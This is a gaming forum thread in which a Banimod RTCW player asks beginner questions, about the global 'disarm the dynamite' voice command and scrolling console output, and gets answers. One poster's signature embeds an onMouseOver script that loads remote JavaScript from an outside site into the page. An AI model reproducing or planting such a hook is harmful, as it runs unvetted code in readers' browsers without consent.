noobile question

Discussion for Banimod players

Moderators: Forum moderators, developers

tdg_sparky

noobile question

Post by tdg_sparky »

Been playing for about 8 months but have been too proud to ask the dumb questions. Playing a little better now so I'll ask and risk the laughs.
-When would anyone ever need to use the vsay "disarm the dynamite"? Is it for some special map or something?
-Does Bani or Ikkyo play for a clan? Do they play RTCW anymore?
-When you type /rules or /settings, you get what the admin allows for the server but most of it scrolls up too fast for you to read. How do you scroll right back up so you can read it?
-When people are having conversations, and everyone is typing so fast that you miss a line that was directed at you, how do you read that line without having to ask the person to repeat themselves? Again is there a way to scroll up the test?
Radeon9.8kpunk

Post by Radeon9.8kpunk »

1. yes on the beach level a eng may not be paying attention til he hears it
2. I believe bani is in some clan called AV or at least its in his name
3. i Just use the console
4. I just use the console or ignore them, if it was important they will ask u again
Bandit is looking for a ET Clan!
I am proficient in combat and medical skills
My accurracy is usually around 35-40%
I usually get at least twice as many kills as deaths
tdg_sparky

Post by tdg_sparky »

Thanks for the speedy response radeon but I can see how I didn't write my questions correctly. Let me reiterate.
-Why is there a GLOBAL vsay of disarm the dynamite, in other words, after the dyno is planted, I often hear the same team on public servers tell you to disarm it. Is it a cheat that the enemy is using? Are they able to disuise their voice or something? My chat time is set to 1 second so i havent had the opportunity to see who was saying this when it happened, and it's happened quite a bit

-In console I type /settings to see what the server settings are and it's about 2 pages of pertinent information that just flies by in console. In console how do I scroll back to read what flew by?

Thanks again for the answers.
Rain

Post by Rain »

tdg_sparky wrote:-Why is there a GLOBAL vsay of disarm the dynamite
All vsays can be either team or public. The only difference is whether the client says 'vsay_team' or 'vsay'.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
RoadKillPuppy

Post by RoadKillPuppy »

tdg_sparky wrote:-In console I type /settings to see what the server settings are and it's about 2 pages of pertinent information that just flies by in console. In console how do I scroll back to read what flew by?
PageUp / PageDown

RKP
Radeon9.8kpunk

Post by Radeon9.8kpunk »

hey, are u the same sparky that posts in the afa forums???
This is Bandit or aFireInside if u r that sparky!
Bandit is looking for a ET Clan!
I am proficient in combat and medical skills
My accurracy is usually around 35-40%
I usually get at least twice as many kills as deaths
tdg_sparky

Post by tdg_sparky »

Thanks for the response, it worked. Simple questions are the embarassing ones but atleast now its outta the way. thanks for the help man.

to afireside, yes i am sparky on afa forums.